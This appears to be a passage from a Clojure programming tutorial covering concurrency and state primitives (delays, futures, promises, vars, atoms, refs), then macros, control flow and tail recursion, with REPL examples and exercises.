In this chapter, we’ll move from immutable references to complex concurrent transactions. In the process we’ll get a taste of concurrency and parallelism, which will motivate the use of more sophisticated identity types. These are not easy concepts, so don’t get discouraged. You don’t have to understand this chapter fully to be a productive programmer, but I do want to hint at why things work this way. As you work with state more, these concepts will solidify.

Immutability

The references we’ve used in let bindings and function arguments are immutable: they never change.

user=> (let [x 1]
         (prn (inc x))
         (prn (inc x)))
2
2

The expression (inc x) did not alter x: x remained 1. The same applies to strings, lists, vectors, maps, sets, and most everything else in Clojure:

user=> (let [x [1 2]]
         (prn (conj x :a))
         (prn (conj x :b)))
[1 2 :a]
[1 2 :b]

Immutability also extends to let bindings, function arguments, and other symbols. Functions remember the values of those symbols at the time the function was constructed.

(defn present
  [gift]
  (fn [] gift))

user=> (def green-box (present "clockwork beetle"))
#'user/green-box
user=> (def red-box (present "plush tiger"))
#'user/red-box
user=> (red-box)
"plush tiger"
user=> (green-box)
"clockwork beetle"

The present function creates a new function. That function takes no arguments, and always returns the gift. Which gift? Because gift is not an argument to the inner function, it refers to the value from the outer function body. When we packaged up the red and green boxes, the functions we created carried with them a memory of the gift symbol’s value.

This is called closing over the gift variable; the inner function is sometimes called a closure. In Clojure, new functions close over all variables except their arguments–the arguments, of course, will be provided when the function is invoked.

Delays

Because a function’s body isn’t evaluated until the function is invoked, functions can be used to defer evaluation of expressions. That’s how we introduced functions originally–like let expressions, but with a number (maybe zero!) of symbols missing, to be filled in at a later time.

user=> (do (prn "Adding") (+ 1 2))
"Adding"
3
user=> (def later (fn [] (prn "Adding") (+ 1 2)))
#'user/later
user=> (later)
"Adding"
3

Evaluating (def later ...) did not evaluate the expressions in the function body. Only when we invoked the function later did Clojure print "Adding" to the screen, and return 3. This is the basis of concurrency: evaluating expressions outside their normal, sequential order.

This pattern of deferring evaluation is so common that there’s a standard macro for it, called delay:

user=> (def later (delay (prn "Adding") (+ 1 2)))
#'user/later
user=> later
#<Delay@2dd31aac: :pending>
user=> (deref later)
"Adding"
3

Instead of a function, delay creates a special type of Delay object: an identity which refers to expressions which should be evaluated later. We extract, or dereference, the value of that identity with deref. Delays follow the same rules as functions, closing over lexical scope–because delay actually macroexpands into an anonymous function.

user=> (source delay)
(defmacro delay
  "Takes a body of expressions and yields a Delay object that will invoke
  the body only the first time it is forced (with force or deref/@), and
  will cache the result and return it on all subsequent force calls. See
  also - realized?"
  {:added "1.0"}
  [& body]
  (list 'new 'clojure.lang.Delay (list* `^{:once true} fn* [] body)))

Why the Delay object instead of a plain old function? Because unlike function invocation, delays only evaluate their expressions once. They remember their value, after the first evaluation, and return it for every successive deref.

user=> (deref later)
3
user=> (deref later)
3

By the way, there’s a shortcut for (deref something): the wormhole operator @:

user=> @later ; Interpreted as (deref later)
3

Remember how map returned a sequence immediately, but didn’t actually perform any computation until we asked for elements? That’s called lazy evaluation. Because delays are lazy, we can avoid doing expensive operations until they’re really needed. Like an IOU, we use delays when we aren’t ready to do something just yet, but when someone calls in the favor, we’ll make sure it happens.

Futures

What if we wanted to opportunistically defer computation? Modern computers have multiple cores, and operating systems let us share a core between two tasks. It would be great if we could use that multitasking ability to say, “I don’t need the result of evaluating these expressions yet, but I’d like it later. Could you start working on it in the meantime?”

Enter the future: a delay which is evaluated in parallel. Like delays, futures return immediately, and give us an identity which will point to the value of the last expression in the future–in this case, the value of (+ 1 2).

user=> (def x (future (prn "hi") (+ 1 2)))
"hi"
#'user/x
user=> (deref x)
3

Notice how the future printed “hi” right away. That’s because futures are evaluated in a new thread. On multicore computers, two threads can run in parallel, on different cores at the same time. When there are more threads than cores, the cores trade off running different threads. Both parallel and non-parallel evaluation of threads are concurrent, because expressions from different threads can be evaluated out of order.

user=> (dotimes [i 5] (future (prn i)))
14
3
0
2
nil

Five threads running at once. Notice that the thread printing 1 didn’t even get to move to a new line before 4 showed up–then both threads wrote new lines at the same time. There are techniques to control this concurrent execution so that things happen in some well-defined sequence, like agents and locks, but we’ll discuss those later.

Just like delays, we can deref a future as many times as we want, and the expressions are only evaluated once.

user=> (def x (future (prn "hi") (+ 1 2)))
#'user/x"hi"
user=> @x
3
user=> @x
3

Futures are the most generic parallel construct in Clojure. You can use futures to do CPU-intensive computation faster, to wait for multiple network requests to complete at once, or to run housekeeping code periodically.
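For instance, here’s a minimal sketch (parallel-map is an invented name, not a core function) of using futures to overlap several slow tasks, so the total wall-clock time is roughly the slowest task rather than the sum:

```clojure
(defn parallel-map
  "Applies f to each element of coll in its own future, then blocks
  for every result."
  [f coll]
  (->> coll
       (mapv (fn [x] (future (f x)))) ; start every task first
       (mapv deref)))                 ; then wait for each result

user=> (parallel-map (fn [x] (Thread/sleep 1000) (inc x)) [1 2 3])
[2 3 4]
```

All three sleeps run at once, so this call returns after roughly one second, not three. Note the eager mapv: a lazy map would start each future only as its result was demanded, serializing the work.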

Promises

Delays defer evaluation, and futures parallelize it. What if we wanted to defer something we don’t even have yet? To hand someone an empty box and, later, before they open it, sneak in and replace its contents with an actual gift? Surely I’m not the only one who does birthday presents this way.

user=> (def box (promise))
#'user/box
user=> box
#<core$promise$reify__6310@1d7762e: :pending>

This box is pending a value. Like futures and delays, if we try to open it, we’ll get stuck and have to wait for something to appear inside:

user=> (deref box)

But unlike futures and delays, this box won’t be filled automatically. Hold the Control key and hit c to give up on trying to open that package. Nobody else is in this REPL, so we’ll have to buy our own presents.

user=> (deliver box :live-scorpions!)
#<core$promise$reify__6310@1d7762e: :live-scorpions!>
user=> (deref box)
:live-scorpions!

Wow, that’s a terrible gift. But at least there’s something there: when we dereference the box, it opens immediately and live scorpions skitter out. Can we get a do-over? Let’s try a nicer gift.

user=> (deliver box :puppy)
nil
user=> (deref box)
:live-scorpions!

Like delays and futures, there’s no going back on our promises. Once delivered, a promise always refers to the same value. This is a simple identity type: we can set it to a value once, and read it as many times as we want. promise is also a concurrency primitive: it guarantees that any attempt to read the value will wait until the value has been written. We can use promises to synchronize a program which is being evaluated concurrently–for instance, this simple card game:

user=> (def card (promise))
#'user/card
user=> (def dealer (future
                     (Thread/sleep 5000)
                     (deliver card [(inc (rand-int 13))
                                    (rand-nth [:clubs :spades :hearts :diamonds])])))
#'user/dealer
user=> (deref card)
[5 :diamonds]

In this program, we set up a dealer thread which waits for five seconds (5000 milliseconds), then delivers a random card. While the dealer is sleeping, we try to deref our card–and have to wait until the five seconds are up. Synchronization and identity in one package.

Where delays are lazy, and futures are parallel, promises are concurrent without specifying how the evaluation occurs. We control exactly when and how the value is delivered. You can think of both delays and futures as being built atop promises, in a way.
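As a sketch of that idea (my-future-call is an invented name, not the real clojure.core implementation), here’s a future-like construct built from nothing but a promise and a thread:

```clojure
(defn my-future-call
  "A toy future: runs f on a new thread, delivering its result to a
  promise. Dereferencing the promise blocks until the thread finishes."
  [f]
  (let [p (promise)]
    (.start (Thread. (fn [] (deliver p (f)))))
    p))

user=> @(my-future-call (fn [] (+ 1 2)))
3
```

The promise provides the synchronization and the one-shot identity; the thread provides the parallelism. Real futures add caching, thread pooling, and exception handling, but the shape is the same.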

Vars

So far the identities we’ve discussed have referred (eventually) to a single value, but the real world needs names that refer to different values at different points in time. For this, we use vars.

We’ve touched on vars before–they’re transparent mutable references. Each var has a value associated with it, and that value can change over time. When a var is evaluated, it is replaced by its present value transparently–everywhere in the program.

user=> (def x :mouse)
#'user/x
user=> (def box (fn [] x))
#'user/box
user=> (box)
:mouse
user=> (def x :cat)
#'user/x
user=> (box)
:cat

The box function closed over x–but calling (box) returned different results depending on the current value of x. Even though the var x remained unchanged throughout this example, the value associated with that var did change!

Using mutable vars allows us to write programs which we can redefine as we go along.

user=> (defn decouple [glider]
         (prn "bolts released"))
#'user/decouple
user=> (defn launch [glider]
         (decouple glider)
         (prn glider "away!"))
#'user/launch
user=> (launch "albatross")
"bolts released"
"albatross" "away!"
nil
user=> (defn decouple [glider]
         (prn "tether released"))
#'user/decouple
user=> (launch "albatross")
"tether released"
"albatross" "away!"

A reference which is the same everywhere is called a global variable, or simply a global. But vars have an additional trick up their sleeve: with a dynamic var, we can override their value only within the scope of a particular function call, and nowhere else.

user=> (def ^:dynamic *board* :maple)
#'user/*board*

^:dynamic tells Clojure that this var can be overridden in one particular scope. By convention, dynamic variables are named with asterisks around them–this reminds us, as programmers, that they are likely to change. Next, we define a function that uses that dynamic var:

user=> (defn cut [] (prn "sawing through" *board*))
#'user/cut

Note that cut closes over the var *board*, but not the value :maple. Every time the function is invoked, it looks up the current value of *board*.

user=> (cut)
"sawing through" :maple
nil
user=> (binding [*board* :cedar] (cut))
"sawing through" :cedar
nil
user=> (cut)
"sawing through" :maple

Like let, the binding macro assigns a value to a name–but where fn and let create immutable lexical scope, binding creates dynamic scope. The difference? Lexical scope is constrained to the literal text of the fn or let expression–but dynamic scope propagates through function calls.

Within the binding expression, and in every function called from that expression, and every function called from those functions, and so on, *board* has the value :cedar. Outside the binding expression, the value is still :maple. This safety property holds even when the program is executed in multiple threads: only the thread which evaluated the binding expression uses that value. Other threads are unaffected.

While we use def all the time in the REPL, in real programs you should only mutate vars sparingly. They’re intended for naming functions, important bits of global data, and for tracking the environment of a program–like where to print messages with prn, which database to talk to, and so on. Using vars for mutable program state is a recipe for disaster, as we’re about to see.

Atoms

Vars can be read, set, and dynamically bound–but they aren’t easy to evolve. Imagine building up a set of integers:

user=> (def xs #{})
#'user/xs
user=> (dotimes [i 10] (def xs (conj xs i)))
user=> xs
#{0 1 2 3 4 5 6 7 8 9}

For each number from 0 to 9, we take the current set of numbers xs, add a particular number i to that set, and redefine xs as the result. This is a common idiom in imperative languages like C, Ruby, Javascript, or Java, where all variables are mutable by default.

ImmutableSet xs = new ImmutableSet();
for (int i = 0; i < 10; i++) {
  xs = xs.add(i);
}

It seems straightforward enough, but there are serious problems lurking here. Specifically, this program is not thread safe.

user=> (def xs #{})
#'user/xs
user=> (dotimes [i 10] (future (def xs (conj xs i))))
nil
user=> xs
#{1 4 5 7}

This program runs 10 threads in parallel, and each reads the current value of xs, adds its particular number, and defines xs to be that new set of numbers. This read-modify-update process assumed that all updates would be consecutive–not concurrent. When we allowed the program to do two read-modify-updates at the same time, updates were lost.

  1. Thread 2 read #{0 1}
  2. Thread 3 read #{0 1}
  3. Thread 2 wrote #{0 1 2}
  4. Thread 3 wrote #{0 1 3}

This interleaving of operations allowed the number 2 to slip through the cracks. We need something stronger–an identity which supports safe transformation from one state to another. Enter atoms.

user=> (def xs (atom #{}))
#'user/xs
user=> xs
#<Atom@30bb8cc9: #{}>

The initial value of this atom is #{}. Unlike vars, atoms are not transparent. When evaluated, they don’t return their underlying values–but notice that when printed, the current value is hiding inside. To get the current value out of an atom, we have to use deref or @.

user=> (deref xs) #{} user=> @xs #{}

Like vars, atoms can be set to a particular value–but instead of def, we use reset!. The exclamation point (sometimes called a bang) is there to remind us that this function modifies the state of its arguments–in this case, changing the value of the atom.

user=> (reset! xs :foo) :foo user=> xs #<Atom@30bb8cc9: :foo>

Unlike vars, atoms can be safely updated using swap!. swap! uses a pure function which takes the current value of the atom and returns a new value. Under the hood, Clojure does some tricks to ensure that these updates are linearizable, which means:

  1. All updates with swap! complete in what appears to be a single consecutive order.
  2. The effect of a swap! never takes place before calling swap!.
  3. The effect of a swap! is visible to everyone once swap! returns.

user=> (def x (atom 0)) #'user/x user=> (swap! x inc) 1 user=> (swap! x inc) 2

The first swap! reads the value 0, calls (inc 0) to obtain 1, and writes 1 back to the atom. Each call to swap! returns the value that was just written.

We can pass additional arguments to the function swap! calls. For instance, (swap! x + 5 6) will call + with the current value of x, followed by 5 and 6, to find the new value. Now we have the tools to correct our parallel program from earlier:

user=> (def xs (atom #{})) #'user/xs user=> (dotimes [i 10] (future (swap! xs conj i))) nil user=> @xs #{0 1 2 3 4 5 6 7 8 9}

Note that the function we use to update an atom must be pure–must not mutate any state–because when resolving conflicts between multiple threads, Clojure might need to call the update function more than once. Clojure’s reliance on immutable datatypes, immutable variables, and pure functions enables this approach to linearizable mutability. Languages which emphasize mutable datatypes need to use other constructs.
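To make that retry behavior concrete, here’s a sketch of how a swap!-like function could be built from Clojure’s compare-and-set!. The name swap-like! is invented for illustration–the real swap! is implemented in Java–but the loop has the same shape:

```clojure
(defn swap-like!
  "A sketch of swap! in terms of compare-and-set!. Reads the current
  value, computes a new one with f, and attempts an atomic swap.
  If another thread changed the atom in between, the compare-and-set!
  fails and we retry--which is why f may run more than once, and
  must therefore be pure."
  [a f & args]
  (let [old @a
        new (apply f old args)]
    (if (compare-and-set! a old new)
      new
      (recur a f args))))
```

(swap-like! (atom 0) + 5 6) returns 11, just as swap! would.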

Atoms are the workhorse of Clojure state. They’re lightweight, safe, fast, and flexible. You can use atoms with any immutable datatype–for instance, a map to track complex state. Reach for an atom whenever you want to update a single thing over time.
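For instance, a single atom can hold a map describing a whole subsystem’s state. The keys here are hypothetical, but the pattern is common:

```clojure
; One atom holding a map of related state.
(def session (atom {:user "aphyr", :logins 0}))

; update-in increments a value nested under a key...
(swap! session update-in [:logins] inc)

; ...and assoc adds or replaces a key outright.
(swap! session assoc :admin? true)

@session ; a map with :logins 1 and :admin? true
```

Because every swap! is linearizable, concurrent updates to different keys of the same map never lose each other’s writes.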

Refs

Atoms are a great way to represent state, but they are only linearizable individually. Updates to an atom aren’t well-ordered with respect to other atoms, so if we try to update more than one atom at once, we could see the same kinds of bugs that we did with vars.

For multi-identity updates, we need a stronger safety property than single-atom linearizability. We want serializability: a global order. For this, Clojure has an identity type called a Ref.

user=> (def x (ref 0)) #'user/x user=> x #<Ref@1835d850: 0>

Like all identity types, refs are dereferencable:

user=> @x 0

But where atoms are updated individually with swap!, refs are updated in groups using dosync transactions. Just as we reset! an atom, we can set refs to new values using ref-set–but unlike atoms, we can change more than one ref at once.

user=> (def x (ref 0)) user=> (def y (ref 0)) user=> (dosync (ref-set x 1) (ref-set y 2)) 2 user=> [@x @y] [1 2]

The equivalent of swap!, for a ref, is alter:

user=> (def x (ref 1)) user=> (def y (ref 2)) user=> (dosync (alter x + 2) (alter y inc)) 3 user=> [@x @y] [3 3]

All alter operations within a dosync take place atomically–their effects are never interleaved with other transactions. If it’s OK for an operation to take place out of order, you can use commute instead of alter for a performance boost:

user=> (dosync (commute x + 2) (commute y inc))

These updates are not guaranteed to take place in the same order–but if all our transactions are equivalent, we can relax the ordering constraints. x + 2 + 3 is equal to x + 3 + 2, so we can do the additions in either order. That’s what commutative means: the same result from all orders. It’s a weaker, but faster kind of safety property.

Finally, if you want to read a value from one ref and use it to update another, use ensure instead of deref to perform a strongly consistent read–one which is guaranteed to take place in the same logical order as the dosync transaction itself. To add y’s current value to x, use:

user=> (dosync (alter x + (ensure y)))

Refs are a powerful construct, and make it easier to write complex transactional logic safely. However, that safety comes at a cost: refs are typically an order of magnitude slower to update than atoms.
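The classic example is transferring money between two accounts: both refs must change together, or not at all. The account names here are invented for illustration:

```clojure
(def checking (ref 100))
(def savings  (ref 0))

(defn transfer!
  "Atomically moves amount from one account ref to another. Either
  both alters commit, or the whole transaction retries--no other
  thread can ever observe money in both places, or in neither."
  [from to amount]
  (dosync
    (alter from - amount)
    (alter to   + amount)))

(transfer! checking savings 30)
[@checking @savings] ; [70 30]
```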

Use refs only where you need to update multiple pieces of state independently–specifically, where different transactions need to work with distinct but partly overlapping pieces of state. If there’s no overlap between updates, use distinct atoms. If all operations update the same identities, use a single atom to hold a map of the system’s state. If a system requires complex interlocking state spread throughout the program–that’s when to reach for refs.

Summary

We moved beyond immutable programs into the world of changing state–and discovered the challenges of concurrency and parallelism. Where symbols provide immutable, transparent names for values, vars provide mutable, transparent names. We also saw a host of anonymous identity types for different purposes: delays for lazy evaluation, futures for parallel evaluation, and promises for arbitrary handoff of a value. Updates to vars are unsafe, so atoms and refs provide linearizable and serializable identities where transformations are safe.

Where reading a symbol or var is transparent–they evaluate directly to their current values–reading these new identity types requires the use of deref. Delays, futures, and promises block: deref must wait until the value is ready. This allows synchronization of concurrent threads. Atoms and refs, by contrast, can be read immediately at any time–but updating their values should occur within a swap! or dosync transaction, respectively.

Type     Mutability  Reads        Updates       Evaluation  Scope
Symbol   Immutable   Transparent                            Lexical
Var      Mutable     Transparent  Unrestricted              Global/Dynamic
Delay    Mutable     Blocking     Once only     Lazy
Future   Mutable     Blocking     Once only     Parallel
Promise  Mutable     Blocking     Once only
Atom     Mutable     Nonblocking  Linearizable
Ref      Mutable     Nonblocking  Serializable

State is undoubtedly the hardest part of programming, and this chapter probably felt overwhelming! On the other hand, we’re now equipped to solve serious problems. We’ll take a break to apply what we’ve learned through practical examples, in Chapter Seven: Logistics.

Exercises

Finding the sum of the first 10000000 numbers takes about 1 second on my machine:

user=> (defn sum [start end] (reduce + (range start end))) user=> (time (sum 0 1e7)) "Elapsed time: 1001.295323 msecs" 49999995000000
  1. Use delay to compute this sum lazily; show that it takes no time to return the delay, but roughly 1 second to deref.

  2. We can do the computation in a new thread directly, using (.start (Thread. (fn [] (sum 0 1e7))))–but this simply runs the (sum) function and discards the results. Use a promise to hand the result back out of the thread. Use this technique to write your own version of the future macro.

  3. If your computer has two cores, you can do this expensive computation twice as fast by splitting it into two parts: (sum 0 (/ 1e7 2)), and (sum (/ 1e7 2) 1e7), then adding those parts together. Use future to do both parts at once, and show that this strategy gets the same answer as the single-threaded version, but takes roughly half the time.

  4. Instead of using reduce, store the sum in an atom and use two futures to add each number from the lower and upper range to that atom. Wait for both futures to complete using deref, then check that the atom contains the right number. Is this technique faster or slower than reduce? Why do you think that might be?

  5. Instead of using a lazy list, imagine two threads are removing tasks from a pile of work. Our work pile will be the list of all integers from 0 to 99999:

    user=> (def work (ref (apply list (range 1e5)))) user=> (take 10 @work) (0 1 2 3 4 5 6 7 8 9)

    And the sum will be a ref as well:

    user=> (def sum (ref 0))

    Write a function which, in a dosync transaction, removes the first number in work and adds it to sum.
    Then, in two futures, call that function over and over again until there’s no work left. Verify that @sum is 4999950000. Experiment with different combinations of alter and commute–if both are correct, is one faster? Does using deref instead of ensure change the result?

In Chapter 1, I asserted that the grammar of Lisp is uniform: every expression is a list, beginning with a verb, and followed by some arguments. Evaluation proceeds from left to right, and every element of the list must be evaluated before evaluating the list itself. Yet we just saw, at the end of Sequences, an expression which seemed to violate these rules.

Clearly, this is not the whole story.

Macroexpansion

There is another phase to evaluating an expression; one which takes place before the rules we’ve followed so far. That process is called macro-expansion. During macro-expansion, the code itself is restructured according to some set of rules–rules which you, the programmer, can define.

(defmacro ignore "Cancels the evaluation of an expression, returning nil instead." [expr] nil) user=> (ignore (+ 1 2)) nil

defmacro looks a lot like defn: it has a name, an optional documentation string, an argument vector, and a body–in this case, just nil. It looks as though the macro simply ignored the expr (+ 1 2) and returned nil–but it’s actually deeper than that: (+ 1 2) was never evaluated at all.

user=> (def x 1) #'user/x user=> x 1 user=> (ignore (def x 2)) nil user=> x 1

def should have defined x to be 2 no matter what–but that never happened. At macroexpansion time, the expression (ignore (+ 1 2)) was replaced by the expression nil, which was then evaluated to nil. Where functions rewrite values, macros rewrite code.

To see these different layers in play, let’s try a macro which reverses the order of arguments to a function.

(defmacro rev [fun & args] (cons fun (reverse args)))

This macro, named rev, takes one mandatory argument: a function. Then it takes any number of arguments, which are collected in the list args. It constructs a new list, starting with the function, and followed by the arguments, in reverse order.

First, we macro-expand:

user=> (macroexpand '(rev str "hi" (+ 1 2))) (str (+ 1 2) "hi")

So the rev macro took str as the function, and "hi" and (+ 1 2) as the arguments; then constructed a new list with the same function, but the arguments reversed. When we evaluate that expression, we get:

user=> (eval (macroexpand '(rev str "hi" (+ 1 2)))) "3hi"

macroexpand takes an expression and returns that expression with all macros expanded. eval takes an expression and evaluates it. When you type an unquoted expression into the REPL, Clojure macroexpands, then evaluates. Two stages–the first transforming code, the second transforming values.

Across languages

Some languages have a metalanguage: a language for extending the language itself. In C, for example, macros are implemented by the C preprocessor, which has its own syntax for defining expressions, matching patterns in the source code’s text, and replacing that text with other text. But that preprocessor is not C–it is a separate language entirely, with special limitations. In Clojure, the metalanguage is Clojure itself–the full power of the language is available to restructure programs. This is called a procedural macro system. Some Lisps, like Scheme, use a macro system based on templating expressions, and still others use more powerful models like f-expressions–but that’s a discussion for a later time.

There is another key difference between Lisp macros and many other macro systems: in Lisp, the macros operate on expressions: the data structure of the code itself. Because Lisp code is written explicitly as a data structure, a tree made out of lists, this transformation is natural. You can see the structure of the code, which makes it easy to reason about its transformation. In the C preprocessor, macros operate only on text: there is no understanding of the underlying syntax. Even in languages like Scala which have syntactic macros, the fact that the code looks nothing like the syntax tree makes it cumbersome to truly restructure expressions.

When people say that Lisp’s syntax is “more elegant”, or “more beautiful”, or “simpler”, this is part of what they mean. By choosing to represent the program directly as a data structure, we make it much easier to define complex transformations of code itself.

Defining new syntax

What kind of transformations are best expressed with macros?

Most languages encode special syntactic forms–things like “define a function”, “call a function”, “define a local variable”, “if this, then that”, and so on. In Clojure, these are called special forms. if is a special form, for instance. Its definition is built into the language core itself; it cannot be reduced into smaller parts.

(if (< 3 x) "big" "small")

Or in Javascript:

if (3 < x) { return "big"; } else { return "small"; }

In Javascript, Ruby, and many other languages, these special forms are fixed. You cannot define your own syntax. For instance, one cannot define or in a language like JS or Ruby: it must be defined for you by the language author.

In Clojure, or is just a macro.

user=> (source or) (defmacro or "Evaluates exprs one at a time, from left to right. If a form returns a logical true value, or returns that value and doesn't evaluate any of the other expressions, otherwise it returns the value of the last expression. (or) returns nil." {:added "1.0"} ([] nil) ([x] x) ([x & next] `(let [or# ~x] (if or# or# (or ~@next))))) nil

That ` operator–that’s called syntax-quote. It works just like regular quote–preventing evaluation of the following list–but with a twist: we can escape the quoting rule and substitute in regularly evaluated expressions using unquote (~), and unquote-splice (~@). Think of a syntax-quoted expression like a template for code, with some parts filled in by evaluated forms.

user=> (let [x 2] `(inc x)) (clojure.core/inc user/x) user=> (let [x 2] `(inc ~x)) (clojure.core/inc 2)

See the difference? ~x substitutes the value of x, instead of using x as an unevaluated symbol. This code is essentially just shorthand for something like

user=> (let [x 2] (list 'clojure.core/inc x)) (inc 2)

… where we explicitly constructed a new list with the quoted symbol 'inc and the current value of x. Syntax quote just makes it easier to read the code, since the quoted and expanded expressions have similar shapes.

The ~@ unquote splice works just like ~, except it explodes a list into multiple expressions in the resulting form:

user=> `(foo ~[1 2 3]) (user/foo [1 2 3]) user=> `(foo ~@[1 2 3]) (user/foo 1 2 3)

~@ is particularly useful when a function or macro takes an arbitrary number of arguments. In the definition of or, it’s used to expand (or a b c) recursively.

user=> (pprint (macroexpand '(or a b c d))) (let* [or__3943__auto__ a] (if or__3943__auto__ or__3943__auto__ (clojure.core/or b c d)))

We’re using pprint (for “pretty print”) to make this expression easier to read. (or a b c d) is defined in terms of if: if the first element is truthy we return it; otherwise we evaluate (or b c d) instead, and so on.

The final piece of the puzzle here is that weirdly named symbol: or__3943__auto__. That variable was automatically generated by Clojure, to prevent conflicts with an existing variable name. Because macros rewrite code, they have to be careful not to interfere with local variables, or it could get very confusing. Whenever we need a new variable in a macro, we use gensym to generate a new symbol.

user=> (gensym "hi") hi326 user=> (gensym "hi") hi329 user=> (gensym "hi") hi332

Each symbol is different! If we tack on a # to the end of a symbol in a syntax-quoted expression, it’ll be expanded to a particular gensym:

user=> `(let [x# 2] x#) (clojure.core/let [x__339__auto__ 2] x__339__auto__)

Note that you can always escape this safety feature if you want to override local variables. That’s called symbol capture, or an anaphoric or unhygienic macro. To override local symbols, just use ~'foo instead of foo#.
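As an illustration, here’s a deliberately unhygienic macro–if-it is a made-up name–which captures the symbol it, binding it to the test’s value so the branches can reuse it:

```clojure
(defmacro if-it
  "An anaphoric if: deliberately captures the symbol `it`,
  binding it to the value of the test expression so the branches
  can refer to that value without naming it themselves."
  [test then else]
  `(let [~'it ~test]
     (if ~'it ~then ~else)))

; Expands to (let [it (first [1 2 3])] (if it (inc it) :empty))
(if-it (first [1 2 3]) (inc it) :empty) ; 2
```

Convenient, but dangerous: if the caller already had a local named it, this macro silently shadows it–which is exactly why Clojure defaults to gensyms.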

With all the pieces on the board, let’s compare the or macro and its expansion:

(defmacro or "Evaluates exprs one at a time, from left to right. If a form returns a logical true value, or returns that value and doesn't evaluate any of the other expressions, otherwise it returns the value of the last expression. (or) returns nil." {:added "1.0"} ([] nil) ([x] x) ([x & next] `(let [or# ~x] (if or# or# (or ~@next))))) user=> (pprint (clojure.walk/macroexpand-all '(or (mossy? stone) (cool? stone) (wet? stone)))) (let* [or__3943__auto__ (mossy? stone)] (if or__3943__auto__ or__3943__auto__ (let* [or__3943__auto__ (cool? stone)] (if or__3943__auto__ or__3943__auto__ (wet? stone)))))

See how the macro’s syntax-quoted (let ... has the same shape as the resulting code? or# is expanded to a variable named or__3943__auto__, which is bound to the expression (mossy? stone). If that variable is truthy, we return it. Otherwise, we (and here’s the recursive part) rebind or__3943__auto__ to (cool? stone) and try again. If that fails, we fall back to evaluating (wet? stone)–thanks to the base case, the single-argument form of the or macro.

Control flow

We’ve seen that or is a macro written in terms of the special form if–and because of the way the macro is structured, it does not obey the normal execution order. In (or a b c), a is evaluated first–then, only if it is false or nil, do we evaluate b. This is called short-circuiting, and it works for and as well.

Changing the order of evaluation in a language is called control flow, and lets programs make decisions based on varying circumstances. We’ve already seen if:

user=> (if (= 2 2) :a :b) :a

if takes a predicate and two expressions, and only evaluates one of them, depending on whether the predicate evaluates to a truthy or falsey value. Sometimes you want to evaluate more than one expression in order. For this, we have do.

user=> (if (pos? -5) (prn "-5 is positive") (do (prn "-5 is negative") (prn "Who would have thought?"))) "-5 is negative" "Who would have thought?" nil

prn is a function which has a side effect: it prints a message to the screen, and returns nil. We wanted to print two messages, but if only takes a single expression per branch–so in our false branch, we used do to wrap up two prns into a single expression, and evaluate them in order. do returns the value of the final expression, which happens to be nil here.

When you only want to take one branch of an if, you can use when:

user=> (when false (prn :hi) (prn :there)) nil user=> (when true (prn :hi) (prn :there)) :hi :there nil

Because there is only one path to take, when takes any number of expressions, and evaluates them only when the predicate is truthy. If the predicate evaluates to nil or false, when does not evaluate its body, and returns nil.

Both when and if have complementary forms, when-not and if-not, which simply invert the sense of their predicate.

user=> (when-not (number? "a string") :here) :here user=> (if-not (vector? (list 1 2 3)) :a :b) :a

Often, you want to perform some operation, and if it’s truthy, re-use that value without recomputing it. For this, we have when-let and if-let. These work just like when and if, respectively, combined with let.

user=> (when-let [x (+ 1 2 3 4)] (str x)) "10" user=> (when-let [x (first [])] (str x)) nil

while evaluates an expression so long as its predicate is truthy. This is generally useful only for side effects, like prn or def; things that change the state of the world.

user=> (def x 0) #'user/x user=> (while (< x 5) #_=> (prn x) #_=> (def x (inc x))) 0 1 2 3 4 nil

cond (for “conditional”) is like a multiheaded if: it takes any number of test/expression pairs, and tries each test in turn. The first test which evaluates truthy causes the following expression to be evaluated; then cond returns that expression’s value.

user=> (cond #_=> (= 2 5) :nope #_=> (= 3 3) :yep #_=> (= 5 5) :cant-get-here #_=> :else :a-default-value) :yep

If you find yourself making several similar decisions based on a value, try condp, for “cond with predicate”. For instance, we might categorize a number based on some ranges:

(defn category "Determines the Saffir-Simpson category of a hurricane, by wind speed in meters/sec" [wind-speed] (condp <= wind-speed 70 :F5 58 :F4 49 :F3 42 :F2 :F1)) ; Default value user=> (category 10) :F1 user=> (category 50) :F3 user=> (category 100) :F5

condp generates code which combines the predicate <= with each number, and the value of wind-speed, like so:

(if (<= 70 wind-speed) :F5 (if (<= 58 wind-speed) :F4 (if (<= 49 wind-speed) :F3 (if (<= 42 wind-speed) :F2 :F1))))

Specialized macros like condp are less commonly used than if or when, but they still play an important role in simplifying repeated code. They clarify the meaning of complex expressions, making them easier to read and maintain.

Finally, there’s case, which works a little bit like a map of keys to values–only the values are code, to be evaluated. You can think of case like (condp = ...), trying to match an expression to a particular branch for which it is equal.

(defn with-tax "Computes the total cost, with tax, of a purchase in the given state." [state subtotal] (case state :WA (* 1.065 subtotal) :OR subtotal :CA (* 1.075 subtotal) ; ... 48 other states ... subtotal)) ; a default case

Unlike cond and condp, case does not evaluate its tests in order. It jumps immediately to the matching expression. This makes case much faster when there are many branches to take–at the cost of reduced generality.

Recursion

Previously, we defined recursive functions by having those functions call themselves explicitly.

(defn sum [numbers] (if-let [n (first numbers)] (+ n (sum (rest numbers))) 0)) user=> (sum (range 10)) 45

But this approach breaks down when we have the function call itself deeply, over and over again.

user=> (sum (range 100000)) StackOverflowError clojure.core/range/fn--4269 (core.clj:2664)

Every time you call a function, the arguments for that function are stored in memory, in a region called the stack. They remain there for as long as the function is being called–including any deeper function calls.

(+ n (sum (rest numbers)))

In order to add n and (sum (rest numbers)), we have to call sum first–while holding onto the memory for n and numbers. We can’t re-use that memory until every single recursive call has completed. Clojure complains, after tens of thousands of stack frames are in use, that it has run out of space in the stack and can allocate no more.

But consider this variation on sum:

(defn sum ([numbers] (sum 0 numbers)) ([subtotal numbers] (if-let [n (first numbers)] (recur (+ subtotal n) (rest numbers)) subtotal))) user=> (sum (range 100000)) 4999950000

We’ve added an additional parameter to the function. In its two-argument form, sum now takes an accumulator, subtotal, which represents the sum so far. In addition, recur has taken the place of sum. Notice, however, that the final expression to be evaluated is not +, but sum (viz. recur) itself. We don’t need to hang on to any of the variables in this function any more, because the final return value won’t depend on them. recur hints to the Clojure compiler that we don’t need to hold on to the stack, and can re-use that space for other things. This is called a tail-recursive function, and it requires only a single stack frame no matter how deep the recursive calls go.

Use recur wherever possible. It requires much less memory and is much faster than the explicit recursion.

You can also use recur within the context of the loop macro, where it acts just like an unnamed recursive function with initial values provided. Think of it, perhaps, like a recursive let.

user=> (loop [i 0 nums []] (if (< 10 i) nums (recur (inc i) (conj nums i)))) [0 1 2 3 4 5 6 7 8 9 10]

Laziness

